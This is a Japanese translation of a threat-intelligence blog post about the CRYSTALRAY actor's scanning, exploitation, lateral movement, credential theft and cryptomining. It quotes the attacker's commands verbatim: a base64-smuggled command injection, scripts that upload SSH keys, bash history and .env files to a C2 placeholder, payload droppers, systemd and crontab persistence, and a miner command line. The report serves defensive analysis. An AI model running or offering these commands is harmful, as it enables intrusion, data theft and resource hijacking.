本文の内容は、2024年7月11日に MIGUEL HERNÁNDEZ が投稿したブログ(https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/)を元に日本語に翻訳・再構成した内容となっております。
Sysdig脅威リサーチチーム(TRT)は、2024年2月に初めて特定したSSH-Snake脅威アクターの観察を続けています。新たな発見によると、最初の攻撃の背後にいる脅威アクターは、その作戦を大幅に拡大しており、アクターおよびキャンペーンを追跡し報告するための識別子としてCRYSTALRAYが付けられました。このアクターは以前、Confluenceの脆弱性を悪用するキャンペーン中に、SSH-Snakeオープンソースソフトウェア(OSS)ペネトレーションテストツールを利用していました。
チームの最新の観察では、CRYSTALRAYの作戦が10倍に拡大し、被害者は1,500人以上にのぼり、大規模なスキャン、多数の脆弱性の悪用、複数のOSSセキュリティツールを使用したバックドアの設置が含まれていることが示されています。
CRYSTALRAYの目的は、資格情報を収集して販売し、暗号通貨のマイナーをデプロイし、被害者環境での持続性を維持することです。脅威アクターが利用しているOSSツールには、zmap、asn、httpx、nuclei、platypus、およびSSH-Snakeが含まれます。
2024年1月4日にリリースされたSSH-Snakeは、自己修正型ワームであり、侵害されたシステムで発見されたSSH認証情報を利用してネットワーク全体に拡散し始めます。
このワームは、既知の認証情報の場所やシェルの履歴ファイルを自動的に検索して、次の動きを決定します。
スクリプト化された攻撃に関連する容易に検出可能なパターンを回避することで、このツールは通常のSSHワームよりもステルス性、柔軟性、構成可能性、および包括的な認証情報の発見能力を提供し、より効率的かつ成功しやすいものとなっています。
技術分析
偵察プロセスとツール
CRYSTALRAYは、正当なOSS組織であるProjectDiscoveryから多くのツールを使用しています。これらには、攻撃者も使用するパッケージマネージャーであるpdtmが含まれます。ProjectDiscoveryは、CRYSTALRAYが作戦で悪用する多くのツールを作成しています。
ASN
CRYSTALRAYは、インターネット全体の大規模なIPv4スキャンや非常に特定のIPターゲットではなく、特定の国のIPレンジを作成して、ボットネットよりも精度が高く、APTやランサムウェア攻撃ほどの精度ではないスキャンを実行します。アメリカと中国が既知のターゲットの54%以上を占めています。
攻撃者はASNツールを利用します。このスクリプトは、ネットワークデータを調査する際に、迅速なOSINTコマンドラインツールを提供する目的で使用されます。Shodanに対してクエリを実行することで、任意のターゲット(CIDRブロック、URL、単一IP、ホスト名)に関するデータを取得し、開いているポート、既知の脆弱性、実行中のソフトウェアやハードウェアなどの完全な概要を迅速に提供します。これにより、ターゲットに対して一度もパケットを送信せずに、詳細な情報を得ることができます。
攻撃者は、このツールを使用して、Marcel Bischoffのcountry-ip-blocksリポジトリからデータをクエリし、特定の国に割り当てられたIPv4/IPv6 CIDRブロックを生成します。以下は、メキシコの例です。
$> asn -c .mxファイルを自動化できるように準備するためのコマンドは以下の通りです。
$> asn -j -c .mx | jq -r '.results[0].ipv4[]' > mx_cidr.txtCode language: JavaScript (javascript)Zmap
ターゲットのIP範囲が定義されると、CRYSTALRAYはzmapを使用して、脆弱なサービスが存在する特定のポートをスキャンします。zmapは、インターネット全体のネットワーク調査のために設計されたシングルパケットネットワークスキャナーであり、nmapよりも高速で誤検出が少ないです。攻撃者は、特にマルチポートスキャンをより効率的に行うために、zmapバージョン4.1.0 RC1を使用します。以下のコマンドはその簡単な例です:
zmap -p <list-ports> -o zmap_results.csv -w cidr.txt Code language: CSS (css)この攻撃者が行ったzmapスキャンの複雑さと知識を示すために、発見された多くの例の中から一例を紹介します。
zmap -p 80,8090,7001,61616 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -o port_80_8090_7001_61616.csv -w cn_cidr.txt -b /etc/zmap/blocklist.conf -B 500MCode language: JavaScript (javascript)- -p 80,8090,7001,61616 → web サーバー、weblogic、およびactivemqのデフォルトポート
- –output-module=csv
- –output-fields=saddr,sport
- –output-filter=’success=1 && repeat=0′
- –no-header-row → help automatization
- -o port_80_8090_7001_61616.csv
- -w cn_cidr.txt → source range IPs
- -b /etc/zmap/blocklist.conf
- -B 500M → bandwidth
zmap スキャン中に攻撃者がさまざまなサービスを多数発見しようとしているのを確認しました。
- Activemq
- Confluence
- Metabase
- Weblogic
- Solr
- Openfire
- Rocketmq
- Laravel
Httpx
攻撃者が zmap の結果を取得すると、再試行可能な http ライブラリを使用して複数のプローブを実行できる、高速で多目的 HTTP ツールキットである httpx を使用します。httpx ツールキットは、スレッド数を増やしても結果の信頼性を維持できるように設計されています。基本的に、このツールは既知の脆弱性を確認する前に、ドメインが稼働中であるか、または偽陽性であるかを検証するために使用できます。
cat zmap_results.csv | sed 's/,/:/g' | sort -u | httpx -t 10000 -rl 1000000 -o httpx_output.txt -streamCode language: JavaScript (javascript)Nuclei
これらのフィルタリングされた結果を用いて、攻撃者は多くの攻撃者が一般的に使用するツールであるnucleiを使用して脆弱性スキャンを実行します。nucleiは、規模に応じて動作できるオープンソースの脆弱性スキャナーです。強力で柔軟なテンプレート機能を備えたnucleiは、あらゆる種類のセキュリティチェックをモデル化するために使用できます。
以下は使用されたコマンドの例です:
cat httpx_output.txt | grep 8090 | nuclei -tags confluence -s critical -bs 1000 -o confluence_rce.txt -stats -stream -c 1 -rl 1000 Nuclei は、ターゲットホストが影響を受ける CVE を出力します。これらの結果により、攻撃者は攻撃の実行段階に進むために使用できる信頼性のあるリストを入手できます。
今回観測された、この攻撃者が使用していた CVE:
- CVE-2022-44877
- CVE-2021-3129
- CVE-2019-18394
CRYSTALRAYは、その攻撃パターンから、nukleusで利用できるConfluenceの新しい脆弱性テストも利用していた可能性が高いと考えられます。
場合によっては、nucleiのタグ引数を使用して、スキャンしたポート上の可能なハニーポットを検出し、それらのターゲットに対してツールを起動しないようにして発見を避けました。これらのハニーポット検出器の一例としてこのプロジェクトがありますが、特にこれが使用されたかどうかは明確ではありません。
cat 8098_http*.txt | grep 443 | sort -u | shuf | nuclei -tags honeypot -bs 1000 -c 1 -rl 100000 -o hpots.txt -stats -stream以下のスクリーンショットは、CRYSTALRAYがzmapを使用して列挙し、httpxでフィルタリングし、最後にnodesを使用してより小さなリストに絞り込んだことを示しています。
CRYSTALRAYは、調査中に合計1,800以上のIPアドレスをターゲットにすることができました。収集したデータに基づいて、この数は今後も増加する可能性があります。以下は、このキャンペーンに影響を受けた地域ごとのIPアドレスの割合です。
初期アクセス
ターゲットにアクセスするために、CRYSTALRAYは既存の脆弱性のPoC(概念実証)を活用し、それをペイロードに合わせて変更することを好みます。以前に収集したターゲットリストを使用して、これらの潜在的な被害者が使用予定のエクスプロイトに対して脆弱であることを確認するチェックを行います。以下のコマンドは、CRYSTALRAYがこのプロセスを実行する方法の一例です:
# Services vulnerable on port 2031
cat port_2031_httpx.txt | nuclei -s critical -tags centos -bs 500 -c 2 -rl 100000 -o 2031_nuclei.txt -stats -si 20 -stream
# Generate simple code to test the vulnerability
echo "curl ip.me" | base64
curl -X POST "https://<victim-IP>:2031/login/index.php?login=$(echo${IFS}Y3VybCBpcC5tZQo=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)" -H "Host: <victim-IP>:2031" -H "Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82" -H "Content-Length: 40" -H "Origin: <victim-IP>:2031" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" -H "Referer: <victim-IP>:2031/login/index.php?login=failed" -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en" -H "Connection: close" --data-urlencode "username=root" --data-urlencode "password=toor" --data-urlencode "commit=Login" -k Y3VybCBpcC5tZQo=
# Get the exploit from GitHub and run it to the victim
git clone https://github.com/Chocapikk/CVE-2022-44877
cd CVE-2022-44877
chmod +x script.sh
./script.sh scan <victim-IP>:2031
# Modified the script and upload to their automatization system.
nano script.shCode language: PHP (php)最後に、CRYSTALRAYはダウンロードしたエクスプロイトを編集し、悪意のあるペイロードを追加します。このペイロードは、多くの場合、PlatypusまたはSliverクライアントです。このプロセスは、彼らが活用している他のエクスプロイトと非常に似ており、すべてOSSツールとPoCを利用しています。
ラテラルムーブメント
できるだけ多くのリソースに影響を与えるため、攻撃者は通常、リモートコード実行(RCE)に成功すると、ラテラルムーブメントを行います。このセクションでは、CRYSTALRAYが被害者の環境内でラテラルムーブメントを行うために使用したツールと戦術について詳しく説明します。
SSH-SNAKE
TRTは、CRYSTALRAYによるオープンソースの侵入テストツールSSH-SNAKEの使用についてすでに報告しています(リリースから2か月後)。SSH-SNAKEは、発見したsshキーと認証情報を使用して新しいシステムに拡散し、そのプロセスを繰り返すワームです。その間、SSH-Snakeは、キャプチャしたキーとbash履歴をC2サーバーに送信します。
CRYSTALRAYは被害者からの結果をC2に送信するために以下のコマンドを実行しました:
if command -v curl >/dev/null 2>&1; then curl --max-time 100 https://raw.githubusercontent.com/MegaManSec/SSH-Snake/main/Snake.nocomments.sh | bash > /tmp/ssh.txt; id=$(curl -4 ip.me); curl --max-time 100 --user '<creds>' --upload-file "/tmp/ssh.txt" "<c2_server>/${id}_ssh.txt"; rm -f /tmp/ssh.txt; fiCode language: JavaScript (javascript)以下は、SSH-Snakeツールの出力で識別されたSSHキーの例です:
コレクション / 認証情報アクセス
環境関連の認証情報
攻撃者は、SSH経由でアクセス可能なサーバー間を移動したいだけではありません。TRTは、CRYSTALRAYがクラウドプロバイダーなどの他のプラットフォームに移動しようとしていたことを発見しました。攻撃者は、影響力を指数関数的に拡大するために、TRTがSCARLETEELでも報告したように、環境変数内の認証情報を探しています。この認証情報の発見プロセスは、攻撃者がアクセス権を得たすべてのデバイスで自動的に実行されます。以下のコマンドは、攻撃者が認証情報を取得し、アップロードする方法です。
tmp=$(find / -type f -name "*.env" -o -name "*.env.bak" -o -name "*config.env" -o -name "*.env.dist" -o -name "*.env.dev" -o -name "*.env.local" -o -name "*.env.backup" -o -name "*.environment" -o -name "*.envrc" -o -name "*.envs" -o -name "*.env~" | grep -v 'Permission denied' > tmp.txt; sed 's/^/cat /;' tmp.txt > cmd.sh; chmod +x cmd.sh; > /dev/null)
exe=$(bash cmd.sh > <env_variables>.txt)
path=$(find / -type f -name env_variables.txt | grep -v 'Permission denied')
id=$(curl -4 ip.me)
curl --upload-file $path <C2_server>/${id}_env_variables.txt
rm -f cmd.sh env_variables.txt tmp.txtCode language: JavaScript (javascript)攻撃者は、今後それらを使用したり、テレグラムなどのブラックマーケットで販売したりします。テレグラムでは、大量に発見された認証情報が販売されています。
ヒストリーファイル
bash コマンドヒストリーは貴重な情報を提供しますが、自動処理が難しいことから、攻撃者による抽出は一般的ではありません。CRYSTALRAY は、システムにホストされている機密情報の発見を迅速化するために、2つのリポジトリを使用しています。
この場合、収集されたデータから生じる可能性のあるさらなる認証情報やトークンを分析または検索するために、それが抽出され、CRYSTALRAYのサーバーに保存されたことが分かっています。
if command -v curl >/dev/null 2>&1; then
tmpfile=$(mktemp -p /tmp); find / -name .bash_history -exec cat {} + 2>/dev/null > "$tmpfile" ; if [ -s "$tmpfile" ]; then id=$(curl -4 ip.me); curl --user '<creds>' --upload-file "$tmpfile" "<c2_server>/${id}_bash_history.txt"; fi; rm -f "$tmpfile"
fiCode language: JavaScript (javascript)元のSSH-SNAKE調査中に収集されたデータでは、100のコマンド履歴が見つかりました。この数は本報告時点で300以上に増加しています。
コマンドとコントロール/永続化
侵害されたシステムへのアクセスを維持することは、攻撃者にとってしばしば優先事項です。これは、TRTが過去に2回報告した一般的な慣行です。
- RUBYCARPは、内部およびボットネット通信の両方にIRCサーバーを使用した最近の事例です。フィッシングキャンペーンとブルートフォース攻撃に重点を置いていました。
- Rebirthltdは、改変されたMiraiバイナリに基づいていました。ゲームサーバーを攻撃し、テレグラムを拠点として、サービスの販売にも使用していました。
Sliver
インジェクションスクリプトの中で、TRTは奇妙なペイロードを実行するために作成されたスクリプトを発見しました。分析中、リサーチャーたちはこのバイナリがSliverで生成されたペイロードであることを突き止めました。Sliverは、あらゆる規模の組織がセキュリティテストを実行するために使用できる、オープンソースのクロスプラットフォームの敵対者エミュレーション/レッドチームフレームワークです。Sliverのインプラントは、Mutual TLS (mTLS)、WireGuard、HTTP(S)、およびDNS経由のC2をサポートし、各バイナリごとに非対称暗号化キーで動的にコンパイルされます。
echo "hostctl"
if [ ! -f /tmp/hostctld ]; then
download_file "<c2_server>/hostctld" "/tmp/hostctld"
sleep 1
chmod +x /tmp/hostctld
nohup /tmp/hostctld >/dev/null 2>&1 &
fi
if ! pgrep -f /tmp/hostctld > /dev/null; then
nohup /tmp/hostctld >/dev/null 2>&1 &
fi
if [ "$(id -u)" -eq 0 ]; then
if command -v systemctl &>/dev/null; then
systemctl stop ext4; systemctl disable ext4; systemctl stop sshb; systemctl disable sshb
echo "User is root and systemctl is installed."
curl -v --user "<creds>" <c2_server>/hostctld --output /usr/bin/hostctld && chmod +x /usr/bin/hostctld && chattr +i /usr/bin/hostctld
echo -e "[Unit]\nDescription=Host Control Daemon\n\n[Service]\nExecStart=/usr/bin/hostctld\nRestart=always\nRestartSec=30\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/hostctld.serviceCode language: JavaScript (javascript)CRYSTALRAYはバイナリを実行することでシステムへのアクセスを維持し、C2サーバーの特定のポートに接続します。基本的には、被害者がエクスプロイトに成功した場合にログを記録します。
この攻撃者は、同じ目的を持つ他の2つのペイロードもホストしていました。 ひとつは前述のdb.exe と似た linux_agent でLinux/Windows用のエクスプロイト後フレームワークであるpentesterツール、emp3ror で作成されたものです。しかし、TRTはそれらが使用されたかどうかを発見できていません。すべてのIoCは、こちらで報告されています。
Platypus
CRYSTALRAYが被害者管理に使用していたダッシュボードは、goで書かれた最新のマルチプルリバースシェルセッション/クライアントウェブベースマネージャーである Platypus というオープンソースツールに基づいていたことがリサーチャーによって発見されました。インストールは非常に簡単です。以下は、最新バージョンのバイナリを実行している例です。以下では、次のような出力が見られます。
Platypusは以前、クリプトマイニング活動で報告されていました。TRTは、ShodanとCensysのインターネットマッピングサービスを使用して、さらに多くのPlatypusダッシュボードを発見しました。デフォルトのダッシュボードポートである7331、およびリバースシェル接続の管理に使用されるポート13338と13339を照会することで、リサーチャーはさらに多くのPlatypusのインスタンスを特定することができました。デフォルトポートは変更できるため、他にもまだ存在している可能性があります。
CRYSTALRAYは、サーバー上でPlatypusを実行しました。これはアクティブなキャンペーンであるため、ダッシュボードは何度もリセットされ、稼働時間に応じて被害者の数は100人から400人にまで変動します。これはダッシュボードの画面ショットです。
CRYSTALRAYの被害者は、以下のコマンドを使用してC2に追加されます(下記)。また、書き込み権限を持つディレクトリをどのようにして探すのかも興味深いところです。
writable_dir=$(find / -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)
cd $writable_dir && curl -fsSL http://<c2_server>:13339/termite/<c2_server>:19951 -o wt && chmod +x wt && nohup ./wt >/dev/null 2>&1 &
writable_dir_2=$(find /var -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)
cd $writable_dir_2 && wget -q http://<c2_server>/termite/<c2_server>:44521 -O .sys && chmod +x .sys && nohup ./.sys >/dev/null 2>&1 &
writable_dir_3=$(find /home -type d \( -writable -a ! -path "/tmp" -a ! -path "/tmp/*" \) -print -quit 2>/dev/null)
cd $writable_dir_3 && wget -q http://<c2_server>:13339/termite/<c2_server>:13337 -O netd && chmod +x netd && nohup ./netd >/dev/null 2>&1 &Code language: JavaScript (javascript)CRYSTALRAYの影響度
クレデンシャルの販売
前述の通り、CRYSTALRAYは脆弱なシステムから認証情報を発見し、抽出することができます。そして、その認証情報は闇市場で数千ドルで販売されます。販売されている認証情報は、クラウドサービスプロバイダやSaaSメールプロバイダなど、多数のサービスが含まれています。
侵害されたホストから盗まれた生データは、攻撃者のC2サーバー上のファイルに保存されます。以下は、ファイルのリストの例です。ファイル名は被害者のIPアドレスで始まります。
TRTはCRYSTALRAYのクリプトマイニング活動を通じて、攻撃者がcontact4restore@airmail[.]ccというメールアドレスを使用していることを突き止めました。contact4restoreを使用して、研究者は他の関連アカウントを検索し、contact4restore@proton[.]meを発見しました。
クリプトマイニング
クラウド攻撃ではよくあることですが、攻撃者がアクセス権を入手すると、被害者のリソースを金銭的利益のために利用しようとします。CRYSTALRAYには2つの関連したクリプトマイナーがあります。1つは古く、あまり隠蔽されておらず、もう1つはより洗練されており、接続先のプールは同じC2サーバー上にホストされていました。
古いスクリプトには、スクリプトをcronタブに追加し、マイナーをダウンロードして実行するための以下の内容が含まれています。
crontab -r
(crontab -l 2>/dev/null; echo "* * * * * curl -v --user 'qwerty:abc123' <c2_server>/lr/rotate --output /tmp/rotate && sh /tmp/rotate && rm -f /tmp/rotate") | crontab -
curl -v --user '<creds>' <c2_server>/lr/lr_linux --output /tmp/logrotate && chmod +x /tmp/logrotate
/tmp/logrotate -o 51.222.12.201:10900 -u ZEPHYR3LgJXAXUmG23rRkN8LAALmt78re3a8PhWnnw5x8EZ5oEStbUuAWvyHnVUWL6EgURTv3MJeaXvn8HAfRQRNGhc89mAy8Ew3J.mx/[email protected] -p x -a "rx/0" --no-huge-pages --backgroundCode language: JavaScript (javascript)見つかった財布はナノプールに接続されており、スクリプトが一致する一部のワーカーも接続されている。およそ、彼らは毎月200ドルほどをマイニングしている。
4月から5月にかけての攻撃で使用された新しいスクリプトでは、CRYSTALRAYは、結果の保存やコマンドおよび制御のホストに使用されたのと同じサーバーにプールをホストした手作りの構成ファイルを使用しました。この場合、TRTは、その操作に関連する残高やウォレットを確認できませんでした。
cat > /usr/bin/config.json <<EOF
{
"autosave": true,
"cpu": {
"enabled": true,
"huge-pages": true,
"yield": true,
"max-threads-hint": 100
},
"opencl": false,
"cuda": false,
"randomx": {
"init": -1,
"init-avx2": -1,
"mode": "auto",
"1gb-pages": true,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"pools": [
{
"url": "<c2_server>:3333"
},
{
"url": "<c2_server>:3333"
}
]
}
EOF
if ! pgrep -x "logrotate" > /dev/null
then
# The process is not running, execute your commands here
echo "logrotate is not running. Executing commands..."
# Replace the following line with the commands you want to execute
curl -v --user '<creds>' <c2_server>/lr/lr_linux --output /tmp/logrotate && chmod +x /tmp/logrotate
/tmp/logrotate -o <c2_server>:3333 --background --cpu-no-yield
curl -v --user '<creds>' <c2_server>/lr_linux --output /usr/bin/log_rotate && chmod +x /usr/bin/log_rotate && chattr +i /usr/bin/log_rotate
echo -e "[Unit]\nDescription=Host Control Daemon\n\n[Service]\nExecStart=/usr/bin/log_rotate\nRestart=always\nRestartSec=30\n\n[Install]\nWantedBy=multi-user.target" > /etc/systemd/system/log_rotate.serviceCode language: PHP (php)競合プロセスを排除する
CRYSTALRAYには、被害者がすでに実行している可能性のあるその他のクリプトマイナーを削除するスクリプトもあります。これは、攻撃者が被害者のリソースをすべて独占的に利用できるようにするための一般的な戦術です。多くの攻撃者が同じ攻撃対象をカバーしているため、以前に侵害されたシステムに遭遇する可能性が高いです。
推奨事項
CRYSTALRAYの事例は、攻撃者がオープンソースと侵入テストツールのみを使用して、いかに簡単に被害者のネットワークへのアクセスを維持し、制御できるかを証明しています。したがって、攻撃者の執拗な攻撃に耐えるための検知と防御対策を導入することが必要です。
こうした自動化された攻撃の大部分を回避するための第一歩は、脆弱性、アイデンティティ、および機密情報の管理を通じて攻撃対象領域を縮小することです。CRYSTALRAYは一例に過ぎませんが、TRTは自動化されたクラウド攻撃をより頻繁に目にしています。
アプリケーションをインターネットに公開する必要がある場合、どこかの時点で脆弱性が生じる可能性があります。そのため、組織は公開のリスクを軽減するために脆弱性の修復を優先付けする必要があります。
最後に、攻撃に成功されたかどうかをいつでも把握し、修復措置を講じ、より徹底的なフォレンジック分析を実施して根本原因を特定できるように、カメラ/実行時検出機能を備える必要があります。
まとめ
CRYSTALRAYは、広範囲にわたる脆弱性スキャンと悪用を行うために複数のオープンソースソフトウェア(OSS)ツールを使用することを好む、新たな脅威の主体です。いったんアクセス権を獲得すると、標的を制御し続けるために、複数のバックドアのうちの1つをインストールします。その後、SSHスネークを使用して被害者のネットワーク全体に拡散し、販売するための認証情報を収集します。また、侵害された資産からさらなる金銭的価値を得るために、クリプトマイナーも展開されます。
IoCs
| Network | |
| 82[.]153.138.25 | c2 |
| 157[.]245.193.241 | c2 |
| 45[.]61.143.47 | c2 |
| aextg[.]us[.]to | c2 |
| linux[.]kyun[.]li | c2 |
| ww-1[.]us[.]to | c2 |
| Binaries | |
| CMiz | a22b0b20052e65ad713f5c3a7427b514ee4f2388f6fda0510e3f5c9ebc78859e |
| HQdI | c98d1d7686b5ff56e50264442ac27d4fb443425539de98458b7cfbf6131b606f |
| igx1 | da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9 |
| pmqE | 06bdd9a6753fba54f2772c1576f31db36f3b2b4e673be7e1ec9af3b180144eb9 |
| Y3Eh | da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9 |
| agent_linux | 6a7b06ed7b15339327983dcd7102e27caf72b218bdaeb5b47d116981df093c52 |
| backup.sh | db029555a58199fa6d02cbc0a7d3f810ab837f1e73eb77ec63d5367fa772298b |
| db.exe | f037d0cc0a1dc30e92b292024ba531bd0385081716cb0acd9e140944de8d3089 |
| hostctld | 1da7479af017ec0dacbada52029584a318aa19ff4b945f1bb9a51472d01284ec |
| logrotate | b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605 |
| lr_bionic | fdced57d370ba188380e681351c888a31b384020dff7e029bd868f5dce732a90 |
| lr_focal | 673a399699ce8dad00fa2dffee2aab413948408e807977451ccd0ceaa8b00b04 |
| lr_linux | 364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c |
| processlib2.so | 8cbec5881e770ecea451b248e7393dfcfc52f8fbb91d20c6e34392054490d039 |
| processlib.so | 908d7443875f3e043e84504568263ec9c39c207ff398285e849a7b5f20304c21 |
| rbmx | 2b945609b5be1171ff9ea8d1ffdca7d7ba4907a68c6f91d409dd41a06bb70154 |
| recon.sh | a544d0ffd75918a4e46108db0ba112b7e95a88054ec628468876c7cf22c203a3 |
| remove_bg.sh | 04fec439f2f08ec1ad8352859c46f865a6353a445410208a50aa638d93f49451 |
| remove.sh | 5a35b7708846f96b3fb5876f7510357c602da67417e726c702ddf1ad2e71f813 |
| rfmx | 7d003d3f5de5044c2c5d41a083837529641bd6bed13769d635c4e7f1b9147295 |
| rotate | 7be2b15b56da32dc5bdb6228c2ed5c3bf3d8fc6236b337f625e3aff73a5c11d3 |
| rotate_cn_rt | 08aaf6a45c17fa38958dd0ed1d9b25126315c6e0d93e7800472d0853ad696a87 |
| rotate_low | 4f20eb19c627239aaf91c662da51ca7f298526df8e0eadccb6bbd7fc1bbcf0b3 |
| xmrig_arm64 | 0841a190e50c6022100c4c56c233108aa01e5da60ba5a57c9778135f42def544 |
| xmrig_freebsd | b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605 |
| kp.sh | 4dc790ef83397af9d9337d10d2e926d263654772a6584354865194a1b06ce305 |
| pk | f2aef4c5f95664e88c2dd21436aa2bee4d2e7f8d32231c238e1aa407120705e4 |